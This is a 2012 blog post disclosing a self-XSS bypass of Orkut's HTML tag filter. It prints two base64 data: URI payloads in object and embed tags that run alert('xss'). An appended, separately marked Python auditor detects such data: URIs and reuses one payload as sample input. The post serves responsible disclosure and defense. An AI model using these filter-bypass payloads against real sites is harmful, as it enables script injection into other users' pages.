Thursday, December 6, 2012

Google Orkut HTML limitations bypass


When playing around on my personal Orkut.com account, I just figured out how to bypass the "Unsupported html tags were removed from the html source." message present in many places, like Profile - About [name] or posting on Updates. This issue could lead to a self XSS.

The trick is to use an object or embed tag on the HTML tab, with the script carried in a base64-encoded data: URI:

<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk7PC9zY3JpcHQ+'></object>

<EMBED SRC='data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoInhzcyIpOzwvc2NyaXB0Pjwvc3ZnPg==' type='image/svg+xml' AllowScriptAccess='always'></EMBED>

When you hit save or click again on the html button, it will execute the code.


The code is not saved, so it's not persistent.

This issue has already been fixed by the Google Security Team, which put me on the Honorable Mention of the Google Vulnerability Reward Program.
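A defensive check for the gap described above, as an added example that is not part of the original post and not Orkut's code: it walks submitted markup and flags URL attributes whose data: URI declares a media type the browser renders as an active document, or whose decoded payload contains a script tag. The attribute list, the media-type list and all function names are assumptions chosen for illustration; the first sample line reuses the object payload from this post, the second is constructed.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import unquote_to_bytes

# Assumed lists: types rendered as active documents, attributes that take URLs.
ACTIVE_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml",
                "text/xml", "application/xml"}
URL_ATTRS = {"data", "src", "href", "action", "formaction", "poster"}

def parse_data_uri(value):
    """Return (media_type, decoded_bytes) for a data: URI, else None."""
    value = "".join(value.split())  # whitespace inside URLs is ignored
    if not value.lower().startswith("data:"):
        return None
    header, _, payload = value[5:].partition(",")
    parts = [p.strip().lower() for p in header.split(";")]
    media_type = parts[0] or "text/plain"
    body = unquote_to_bytes(payload)
    if "base64" in parts[1:]:
        try:
            body = base64.b64decode(body + b"=" * (-len(body) % 4))
        except ValueError:  # malformed base64: nothing to inspect
            body = b""
    return media_type, body

class DataUriAudit(HTMLParser):
    """Collects (tag, attr, media_type, reason); names arrive lowercased."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            parsed = parse_data_uri(value or "") if name in URL_ATTRS else None
            if parsed is None:
                continue
            media_type, body = parsed
            if media_type in ACTIVE_TYPES:
                self.findings.append((tag, name, media_type, "active media type"))
            elif b"<script" in body.lower():
                self.findings.append((tag, name, media_type, "script in payload"))

def audit(html):
    parser = DataUriAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

SAMPLE = ("<object data='data:text/html;base64,"
          "PHNjcmlwdD5hbGVydCgveHNzLyk7PC9zY3JpcHQ+'></object>\n"
          "<img src='data:image/png;base64,iVBORw0KGgo='>")  # constructed, inert
```

Running `audit(SAMPLE)` reports only the object tag. A sanitizer would normally drop object and embed outright; this check covers the case where a tag allowlist passes them and the URL scheme is never inspected.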